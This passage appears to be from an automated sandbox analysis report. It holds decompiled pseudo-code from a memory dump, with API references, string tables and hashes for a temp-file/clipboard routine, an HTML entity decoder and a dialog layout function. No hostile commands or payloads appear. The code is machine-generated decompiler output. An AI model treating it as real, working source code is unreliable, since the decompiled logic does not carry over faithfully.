				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F41(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}

0x0040ac8a
0x0040ac95
0x0040aca4
0x0040acaa
0x0040acac
0x0040acb6
0x0040acb6
0x0040acd1
0x0040acd8
0x0040ace9
0x0040acf0
0x0040acf8
0x0040acfe
0x0040ad00
0x0040ad11
0x0040ad02
0x0040ad09
0x0040ad0e
0x0040ad19
0x0040ad21
0x0040ad26
0x00000000
0x0040ad2e
0x0040ad37

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
OpenClipboard.USER32(?), ref: 0040ACF8
GetLastError.KERNEL32 ref: 0040AD11
DeleteFileA.KERNEL32(00000000), ref: 0040AD2E

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
String ID:
API String ID: 2014771361-0
Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040F808, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307
stringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406512( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}

0x0040f813
0x0040f81a
0x0040f821
0x0040f828
0x0040f82f
0x0040f836
0x0040f83d
0x0040f841
0x0040f845
0x0040f849
0x0040f84d
0x0040f851
0x0040f855
0x0040f85f
0x0040f869
0x0040f873
0x0040f87d
0x0040f887
0x0040f891
0x0040f89b
0x0040f8a5
0x0040f8af
0x0040f8b9
0x0040f8c3
0x0040f8cd
0x0040f8d7
0x0040f8e1
0x0040f8eb
0x0040f8f5
0x0040f8ff
0x0040f909
0x0040f913
0x0040f91d
0x0040f927
0x0040f931
0x0040f93b
0x0040f945
0x0040f94f
0x0040f959
0x0040f963
0x0040f96d
0x0040f977
0x0040f981
0x0040f98b
0x0040f995
0x0040f99f
0x0040f9a9
0x0040f9b3
0x0040f9bd
0x0040f9c7
0x0040f9d1
0x0040f9db
0x0040f9e5
0x0040f9ef
0x0040f9f9
0x0040fa03
0x0040fa0d
0x0040fa17
0x0040fa21
0x0040fa2b
0x0040fa35
0x0040fa3f
0x0040fa49
0x0040fa53
0x0040fa5d
0x0040fa67
0x0040fa71
0x0040fa7b
0x0040fa85
0x0040fa8f
0x0040fa99
0x0040faa3
0x0040faad
0x0040fab7
0x0040fac1
0x0040facb
0x0040fad5
0x0040fadf
0x0040fae9
0x0040faf3
0x0040faf6
0x0040fafa
0x0040fafc
0x0040fb00
0x0040fb0a
0x0040fb14
0x0040fb1e
0x0040fb28
0x0040fb32
0x0040fb3c
0x0040fb46
0x0040fb50
0x0040fb5a
0x0040fb64
0x0040fb6e
0x0040fb78
0x0040fb82
0x0040fb8c
0x0040fb96
0x0040fba0
0x0040fbaa
0x0040fbb1
0x0040fbb8
0x0040fbbf
0x0040fbc6
0x0040fbcd
0x0040fbd4
0x0040fbdb
0x0040fbe2
0x0040fbe9
0x0040fbf0
0x0040fbf7
0x0040fde5
0x0040fde8
0x0040fdee
0x0040fdf1
0x0040fe04
0x0040fdfd
0x0040fdfd
0x00000000
0x0040fdfd
0x0040fdf1
0x0040fbfe
0x0040fc0d
0x0040fc10
0x0040fc14
0x0040fc17
0x0040fd94
0x0040fd98
0x0040fdd2
0x0040fdd5
0x0040fd9e
0x0040fda1
0x0040fda6
0x0040fdaa
0x0040fdaf
0x0040fdb6
0x0040fdb6
0x0040fdaf
0x0040fdb8
0x0040fdb8
0x0040fdd6
0x0040fdd7
0x0040fdd7
0x0040fdde
0x00000000
0x00000000
0x00000000
0x0040fdde
0x0040fc1d
0x0040fc20
0x0040fc23
0x0040fc27
0x0040fc31
0x0040fc37
0x0040fc3c
0x0040fc41
0x00000000
0x00000000
0x0040fc43
0x0040fc47
0x00000000
0x00000000
0x0040fc49
0x0040fc51
0x0040fd5c
0x0040fd5c
0x0040fd60
0x0040fd63
0x0040fd6b
0x0040fd73
0x0040fd7c
0x0040fd81
0x0040fd86
0x00000000
0x00000000
0x0040fd88
0x0040fd8f
0x00000000
0x00000000
0x0040fd91
0x00000000
0x0040fd91
0x0040fdc5
0x0040fdc8
0x0040fdc9
0x00000000
0x0040fdc9
0x0040fc57
0x0040fc57
0x0040fc5b
0x0040fc60
0x0040fd11
0x0040fd11
0x0040fd15
0x0040fd17
0x0040fd26
0x0040fd26
0x0040fd2a
0x00000000
0x00000000
0x0040fd1d
0x0040fd2f
0x0040fd31
0x00000000
0x00000000
0x0040fd39
0x0040fd42
0x0040fd47
0x0040fd4f
0x0040fd52
0x0040fd55
0x0040fd56
0x00000000
0x0040fd56
0x0040fd1f
0x0040fd23
0x00000000
0x00000000
0x0040fd25
0x0040fd25
0x0040fd2c
0x00000000
0x0040fc6f
0x0040fc6f
0x0040fc71
0x0040fc97
0x0040fc97
0x0040fc9b
0x00000000
0x00000000
0x0040fc8e
0x0040fd0c
0x0040fca1
0x0040fca5
0x00000000
0x00000000
0x0040fcb3
0x0040fcbb
0x0040fcc4
0x0040fcc9
0x0040fcd4
0x0040fce3
0x0040fceb
0x0040fcec
0x0040fcf0
0x0040fcfc
0x0040fd02
0x0040fd03
0x00000000
0x0040fd03
0x0040fc90
0x0040fc94
0x00000000
0x00000000
0x0040fc96
0x0040fc96
0x0040fc9d
0x00000000
0x0040fc9d
0x0040fc60
0x0040fc7c
0x0040fc82
0x0040fc83
0x00000000
0x0040fc83
0x00000000

APIs

strlen.MSVCRT ref: 0040FC27
strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
memcpy.MSVCRT ref: 0040FCB3
atoi.MSVCRT ref: 0040FCC4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0

Strings

ccedil;, xrefs: 0040FB1E
ouml;, xrefs: 0040FBB1
para;, xrefs: 0040F927
Atilde;, xrefs: 0040F9A9
Ntilde;, xrefs: 0040FA35
acute;, xrefs: 0040F913
shy;, xrefs: 0040F8CD
atilde;, xrefs: 0040FAE9
ucirc;, xrefs: 0040FBD4
Ecirc;, xrefs: 0040F9EF
szlig;, xrefs: 0040FAC1
pound;, xrefs: 0040F869
icirc;, xrefs: 0040FB64
plusmn;, xrefs: 0040F8F5
Agrave;, xrefs: 0040F98B
iacute;, xrefs: 0040FB5A
frac14;, xrefs: 0040F963
Otilde;, xrefs: 0040FA5D
iquest;, xrefs: 0040F981
Oslash;, xrefs: 0040FA7B
otilde;, xrefs: 0040FBAA
egrave;, xrefs: 0040FB28
Auml;, xrefs: 0040F9B3
Yacute;, xrefs: 0040FAAD
Egrave;, xrefs: 0040F9DB
brvbar;, xrefs: 0040F887
yuml;, xrefs: 0040FBF0
AElig;, xrefs: 0040F9C7
igrave;, xrefs: 0040FB50
Icirc;, xrefs: 0040FA17
Igrave;, xrefs: 0040FA03
uuml;, xrefs: 0040FBDB
nbsp;, xrefs: 0040F82F
raquo;, xrefs: 0040F959
reg;, xrefs: 0040F8D7
Ocirc;, xrefs: 0040FA53
Oacute;, xrefs: 0040FA49
ordm;, xrefs: 0040F94F
laquo;, xrefs: 0040F8B9
Uacute;, xrefs: 0040FA8F
middot;, xrefs: 0040F931
aelig;, xrefs: 0040FB14
agrave;, xrefs: 0040FACB
Aring;, xrefs: 0040F9BD
apos;, xrefs: 0040F836
times;, xrefs: 0040FA71
sup2;, xrefs: 0040F8FF
lt;, xrefs: 0040F81A
sup1;, xrefs: 0040F945
ecirc;, xrefs: 0040FB3C
frac34;, xrefs: 0040F977
not;, xrefs: 0040F8C3
curren;, xrefs: 0040F873
Iacute;, xrefs: 0040FA0D
divide;, xrefs: 0040FBB8
Ugrave;, xrefs: 0040FA85
aring;, xrefs: 0040FB0A
eacute;, xrefs: 0040FB32
ETH;, xrefs: 0040FA2B
Ograve;, xrefs: 0040FA3F
micro;, xrefs: 0040F91D
ograve;, xrefs: 0040FB8C
acirc;, xrefs: 0040FADF
ntilde;, xrefs: 0040FB82
macr;, xrefs: 0040F8E1
Uuml;, xrefs: 0040FAA3
iexcl;, xrefs: 0040F855
sect;, xrefs: 0040F891
Acirc;, xrefs: 0040F99F
ordf;, xrefs: 0040F8AF
yacute;, xrefs: 0040FBE2
eth;, xrefs: 0040FB78
thorn;, xrefs: 0040FBE9
Ucirc;, xrefs: 0040FA99
Euml;, xrefs: 0040F9F9
gt;, xrefs: 0040F821
yen;, xrefs: 0040F87D
Iuml;, xrefs: 0040FA21
iuml;, xrefs: 0040FB6E
copy;, xrefs: 0040F8A5
Aacute;, xrefs: 0040F995
amp;, xrefs: 0040F813
THORN;, xrefs: 0040FAB7
Eacute;, xrefs: 0040F9E5
Ccedil;, xrefs: 0040F9D1
deg;, xrefs: 0040F8EB
quot;, xrefs: 0040F828
euml;, xrefs: 0040FB46
cedil;, xrefs: 0040F93B
frac12;, xrefs: 0040F96D
ugrave;, xrefs: 0040FBC6
auml;, xrefs: 0040FB00
uml;, xrefs: 0040F89B
oslash;, xrefs: 0040FBBF
oacute;, xrefs: 0040FB96
uacute;, xrefs: 0040FBCD
aacute;, xrefs: 0040FAD5
sup3;, xrefs: 0040F909
ocirc;, xrefs: 0040FBA0
cent;, xrefs: 0040F85F
Ouml;, xrefs: 0040FA67

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
API String ID: 1895597112-3210201812
Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4A4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E004118A0(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

0x0040e4a4
0x0040e4a7
0x0040e4af
0x0040e4cd
0x0040e4db
0x0040e4e8
0x0040e4f4
0x0040e4fd
0x0040e509
0x0040e515
0x0040e51f
0x0040e52a
0x0040e53e
0x0040e54c
0x0040e55d
0x0040e561
0x0040e566
0x0040e575
0x0040e581
0x0040e585
0x0040e58d
0x0040e591
0x0040e629
0x0040e62c
0x0040e638
0x0040e746
0x0040e74b
0x0040e757
0x0040e75b
0x0040e769
0x0040e780
0x0040e78a
0x0040e7d0
0x0040e7da
0x0040e819
0x0040e819
0x0040e649
0x0040e65a
0x0040e65e
0x0040e662
0x0040e66a
0x0040e69c
0x0040e6cc
0x0040e6e3
0x0040e6e8
0x0040e6f7
0x0040e715
0x0040e726
0x0040e72b
0x0040e72f
0x0040e73a
0x00000000
0x0040e662
0x0040e59a
0x0040e59c
0x0040e5a6
0x0040e5aa
0x0040e610
0x0040e614
0x0040e619
0x0040e61d
0x0040e621
0x0040e623
0x00000000
0x0040e623
0x0040e5b3
0x0040e5b7
0x0040e5de
0x0040e5e7
0x0040e5ee
0x0040e5f0
0x0040e5f0
0x0040e5ee
0x0040e5f4
0x0040e5ff
0x0040e604
0x0040e60c
0x00000000

APIs

GetDlgItem.USER32 ref: 0040E4D1
GetDlgItem.USER32 ref: 0040E4DD
GetWindowLongA.USER32 ref: 0040E4EC
GetWindowLongA.USER32 ref: 0040E4F8
GetWindowLongA.USER32 ref: 0040E501
GetWindowLongA.USER32 ref: 0040E50D
GetWindowRect.USER32 ref: 0040E51F
GetWindowRect.USER32 ref: 0040E52A
MapWindowPoints.USER32 ref: 0040E53E
MapWindowPoints.USER32 ref: 0040E54C
GetDC.USER32 ref: 0040E585
strlen.MSVCRT ref: 0040E5C5
GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040E5D6
ReleaseDC.USER32 ref: 0040E623
sprintf.MSVCRT ref: 0040E6E3
SetWindowTextA.USER32(?,?), ref: 0040E6F7
SetWindowTextA.USER32(?,00000000), ref: 0040E715
GetDlgItem.USER32 ref: 0040E74B
GetWindowRect.USER32 ref: 0040E75B
MapWindowPoints.USER32 ref: 0040E769
GetClientRect.USER32 ref: 0040E780
GetWindowRect.USER32 ref: 0040E78A
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040E7D0
GetClientRect.USER32 ref: 0040E7DA
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040E812

Strings

%s:, xrefs: 0040E6DD
EDIT, xrefs: 0040E6BE
STATIC, xrefs: 0040E687

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
String ID: %s:$EDIT$STATIC
API String ID: 1703216249-3046471546
Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
